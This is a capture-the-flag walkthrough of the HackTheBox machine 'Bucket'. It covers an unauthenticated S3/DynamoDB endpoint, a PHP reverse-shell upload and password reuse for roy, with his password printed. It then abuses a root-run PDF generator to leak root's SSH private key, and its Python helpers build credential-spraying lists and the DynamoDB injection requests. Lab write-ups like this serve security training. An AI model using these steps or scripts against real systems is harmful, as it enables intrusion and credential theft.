Bucket 10.10.10.212
No technology that's connected to the internet is unhackable. <Abhijit Naskar>
Last updated
Bucket is a Linux machine from HackTheBox built around a self-hosted Amazon Simple Storage Service (Amazon S3) endpoint. It requires some basic knowledge of AWS services, in particular the AWS Command Line Interface (AWS CLI) and the DynamoDB database service.
After basic enumeration, you find that the hosts file needs two entries, bucket.htb and s3.bucket.htb, before you can go any further.
Running a web folder enumeration tool (gobuster) against s3.bucket.htb turned up a health page showing that a DynamoDB service was set up and running. The AWS CLI was then used to enumerate both the S3 bucket and DynamoDB; the API accepted queries without any authentication. Finally, a table named "users" was found that listed three sets of credentials, which proved very useful later.
The AWS CLI was also used to enumerate the bucket's folder structure and to upload a PHP reverse shell. From that shell, a local user named "roy" was found, and one of the passwords from the users table logged in as him. That gave the user flag.
Logged in as roy, I found port 8000 listening on localhost only, serving /var/www/bucket-app/. It runs a PHP program owned by root that renders a database value into a PDF. By abusing that program, the contents of root's SSH private key (/root/.ssh/id_rsa) were written into the PDF.
Using that private key to SSH into bucket.htb gave a root shell.
130n@calvinlai.com
Target Machine: 10.10.10.212
Attacker Machine: 10.10.14.8
Port 80 redirected to bucket.htb, so the web service could not be enumerated further until that name was added to the hosts file.
Check Website Vulnerability
Check any hidden files/folders of the website
Check the website
Visiting the website and reading the page source showed that s3.bucket.htb must also be added to the hosts file before going further.
Running gobuster against http://s3.bucket.htb and http://bucket.htb found three hidden folders under s3.bucket.htb, while nothing of interest came back from http://bucket.htb, so I concentrated on the s3 host.
Visiting the health folder showed that a DynamoDB service used by the application was reported as running.
Before starting, install the AWS command-line interface tool and configure it. The CLI still wants an access key and secret configured so it can sign requests, but this endpoint does not validate them, so any values will do.
Following the AWS documentation, the table records can be queried with the CLI's DynamoDB commands. After some trial and error a table named "users" was identified and its contents listed. However, none of the usernames in it could log in via SSH.
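To show what the scan step yields, and how it feeds the SSH password guessing used later to get into roy's account, here is an added Python example (not code from the original writeup). It flattens the typed JSON that aws dynamodb scan prints into plain rows, pulls out the user and password columns, and pairs every recovered password with the accounts that actually exist on the box, since the table's own usernames were not system accounts. The scan response embedded in it is constructed for the example; its three accounts and passwords are made up and are not the ones on Bucket, and the column names "username" and "password" are assumed.

```python
"""Flatten `aws dynamodb scan` output into credentials to try over SSH.

Added example, not code from the original writeup. SAMPLE_SCAN is a
constructed response in the shape DynamoDB returns for
`aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users`;
the accounts and passwords in it are made up and are not the box's.
"""
import json

SAMPLE_SCAN = json.dumps({
    "Items": [
        {"username": {"S": "Mgmt"}, "password": {"S": "Passw0rd-one"}},
        {"username": {"S": "Cloudadm"}, "password": {"S": "Passw0rd-two"}},
        {"username": {"S": "Sysadm"}, "password": {"S": "Passw0rd-three"}, "uid": {"N": "1003"}},
    ],
    "Count": 3,
    "ScannedCount": 3,
    "ConsumedCapacity": None,
})


def unmarshal(attr):
    """Turn one DynamoDB typed attribute ({"S": "x"}, {"N": "1"}, ...) into a plain value."""
    (kind, value), = attr.items()
    if kind == "S":
        return value
    if kind == "N":
        return float(value) if "." in value else int(value)
    if kind == "BOOL":
        return value
    if kind == "NULL":
        return None
    if kind in ("SS", "NS"):
        return [unmarshal({kind[0]: v}) for v in value]
    if kind == "L":
        return [unmarshal(v) for v in value]
    if kind == "M":
        return {k: unmarshal(v) for k, v in value.items()}
    raise ValueError(f"unsupported attribute type {kind}")


def scan_rows(scan_json):
    """Plain dicts for every item of a scan response (JSON text or parsed object)."""
    doc = json.loads(scan_json) if isinstance(scan_json, str) else scan_json
    return [{k: unmarshal(v) for k, v in item.items()} for item in doc.get("Items", [])]


def credentials(rows, user_keys=("username", "user", "login", "email"),
                pass_keys=("password", "pass", "pwd")):
    """(user, password) pairs, tolerant of whichever column names the app chose."""
    pairs = []
    for row in rows:
        user = next((row[k] for k in user_keys if k in row), None)
        pw = next((row[k] for k in pass_keys if k in row), None)
        if user is not None and pw is not None:
            pairs.append((str(user), str(pw)))
    return pairs


def spray_targets(pairs, local_users):
    """Every recovered password against every account that exists on the box.

    On Bucket the table's usernames were not system accounts, while one of
    the passwords was reused by roy; this is the list to feed to hydra or an
    ssh loop. Duplicate passwords are tried once per account.
    """
    passwords = list(dict.fromkeys(pw for _, pw in pairs))
    return [(u, pw) for u in local_users for pw in passwords]


if __name__ == "__main__":
    found = credentials(scan_rows(SAMPLE_SCAN))
    # "login:password" lines, the format hydra's -C option reads
    for user, pw in spray_targets(found, ["roy"]):
        print(f"{user}:{pw}")
```

Pipe the output into a file and hand it to hydra with -C, or loop over it with sshpass; either way the test is one password per line against the handful of real accounts found in /etc/passwd, not the table's usernames.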
Querying the site requires no authentication, so I could list the folder structure and even copy files. Therefore a PHP reverse TCP shell was prepared and uploaded to the environment.
Using pentestmonkey's php-reverse-shell, with a netcat listener waiting on the callback port, the shell was uploaded to the server with the command "aws --endpoint-url http://s3.bucket.htb/ s3 cp php-reverse-shell.php s3://adserver".
Note: the machine cleans up uploaded files every 30 seconds, so you need to be quick between uploading and triggering.
I requested my PHP file at http://bucket.htb/php-reverse-shell.php with curl to speed the process up. Finally I got the reverse shell and started enumerating again.
The user flag was in roy's home directory (/home/roy), which the web server account could not read. The new target was the roy account.
During the DynamoDB enumeration a set of passwords had been collected, so I tried each of them against roy over SSH. Roy's password turned out to be "n2vM-<_K_Q:.Aa2".
Got the user flag
Running linPEAS for enumeration showed the server listening on some interesting ports; let's try them one by one.
Port 8000 returned an HTML page. Reading its source showed that the document root is /var/www/bucket-app/, with the application in /var/www/bucket-app/index.php.
This PHP script does the following:
It looks for a POST request with the parameter action=get_alerts (lines 17 and 18)
Creates a new DynamoDB client (line 28)
Scans a table called "alerts" and looks for an item whose title is "Ransomware"
Prints the data from that item into a PDF using Pd4Cmd
From the enumeration above, the "alerts" table does not exist. So the question is whether I can create the "alerts" table myself and insert a record of my choosing.
Reference: Amazon DynamoDB Documentation
Which value should I add? Reading /root/root.txt directly works (tested, and the flag was accepted), but that is not how the game is meant to be played. After some googling, the better target is root's SSH private key, which gives a proper root login. Stealing /root/.ssh/id_rsa is the objective.
Steps:
Run the command on my Kali machine to create the table
Run the command on my Kali machine to add a record to the table
Trigger the page from the box as roy: curl --data "action=get_alerts" http://localhost:8000/
SCP the result.pdf file to my Kali machine: scp roy@bucket.htb:/var/www/bucket-app/files/result.pdf ./
The result.pdf contains root's SSH private key.
1) Reformat the private key into a file and chmod it to 600: -rw------- 1 root root 2603 Dec 27 11:43 cert.ssh
2) ssh -i cert.ssh root@10.10.10.212
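The table-and-record steps above and the key clean-up in step 1, as an added Python example (not code from the original writeup or from bucket-app). It assumes the attribute names the application reads are "title" and "data"; the writeup only says the script matches the title "Ransomware" and prints the data, and it does not show the record body that makes Pd4Cmd include the file, so that body is passed in as a parameter rather than guessed. The functions produce the JSON for aws dynamodb create-table --cli-input-json and put-item --item, and reformat_pem rewraps the key text copied out of result.pdf into lines ssh will accept. The key text used under __main__ is a constructed placeholder, not a real key.

```python
"""Build the DynamoDB requests for the alerts table and clean up the key text
pulled out of result.pdf.

Added example, not code from the original writeup or from bucket-app.
Assumptions: the app reads attributes named "title" and "data"; the record
body that makes Pd4Cmd include the file is not shown in the writeup and is
taken as a parameter.
"""
import json
import os
import re

ENDPOINT = "http://s3.bucket.htb"  # local DynamoDB/S3 endpoint found via /health


def create_table_request(table="alerts", key="title"):
    """Body for `aws dynamodb create-table --cli-input-json file://create.json`."""
    return {
        "TableName": table,
        "AttributeDefinitions": [{"AttributeName": key, "AttributeType": "S"}],
        "KeySchema": [{"AttributeName": key, "KeyType": "HASH"}],
        "ProvisionedThroughput": {"ReadCapacityUnits": 5, "WriteCapacityUnits": 5},
    }


def alert_item(data, title="Ransomware"):
    """Typed item for `aws dynamodb put-item --item file://item.json`.

    `title` must be the word the script scans for; `data` is whatever the
    PDF renderer is meant to process (attribute name "data" is assumed).
    """
    return {"title": {"S": title}, "data": {"S": data}}


def cli_commands(table="alerts", endpoint=ENDPOINT):
    """The aws CLI calls run from Kali, plus the trigger run on the box as roy."""
    return [
        f"aws --endpoint-url {endpoint} dynamodb create-table --cli-input-json file://create.json",
        f"aws --endpoint-url {endpoint} dynamodb put-item --table-name {table} --item file://item.json",
        "curl --data 'action=get_alerts' http://localhost:8000/",
    ]


PEM_RE = re.compile(r"-----BEGIN ([A-Z ]+)-----(.*?)-----END \1-----", re.S)


def reformat_pem(raw):
    """Re-wrap a private key copied out of a PDF.

    Text extraction keeps the BEGIN/END markers and every base64 character
    but joins or breaks the lines arbitrarily. Drop all whitespace from the
    body and rewrap it: 64 columns for PEM ("RSA PRIVATE KEY"), 70 for the
    OpenSSH container format, matching how the originals are written.
    """
    m = PEM_RE.search(raw)
    if not m:
        raise ValueError("no BEGIN/END private key markers found")
    label = m.group(1)
    body = re.sub(r"\s+", "", m.group(2))
    width = 70 if label == "OPENSSH PRIVATE KEY" else 64
    chunks = [body[i:i + width] for i in range(0, len(body), width)]
    return "\n".join([f"-----BEGIN {label}-----", *chunks, f"-----END {label}-----"]) + "\n"


def write_key(path, pem_text):
    """Create the key file with mode 0600 so ssh does not refuse to use it."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "w") as fh:
        fh.write(pem_text)
    os.chmod(path, 0o600)  # the file may already have existed with a looser mode
    return path


if __name__ == "__main__":
    with open("create.json", "w") as fh:
        json.dump(create_table_request(), fh, indent=2)
    with open("item.json", "w") as fh:
        json.dump(alert_item("<p>record body goes here</p>"), fh, indent=2)
    print("\n".join(cli_commands()))
    # Constructed placeholder, not a real key: the kind of text PDF extraction produces.
    mangled = ("-----BEGIN RSA PRIVATE KEY----- MIIEow IBAAKCAQEA "
               + "QUJD" * 40 + " -----END RSA PRIVATE KEY-----")
    write_key("cert.ssh", reformat_pem(mangled))
    print(reformat_pem(mangled))
```

The two JSON files are what the first two steps feed to the CLI; after the curl on the box and the scp back, paste the key text from the PDF into reformat_pem and hand the written cert.ssh to ssh -i.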
Server misconfiguration is the major problem on this box. The S3 and DynamoDB endpoints applied no authentication to their APIs, which let an attacker query the service and upload a reverse shell with ease.
Secondly, plaintext passwords stored in a database table gave me the initial foothold, because one of them was reused by a system account.
System configuration should be reviewed before a deployment is exposed in a public cloud environment.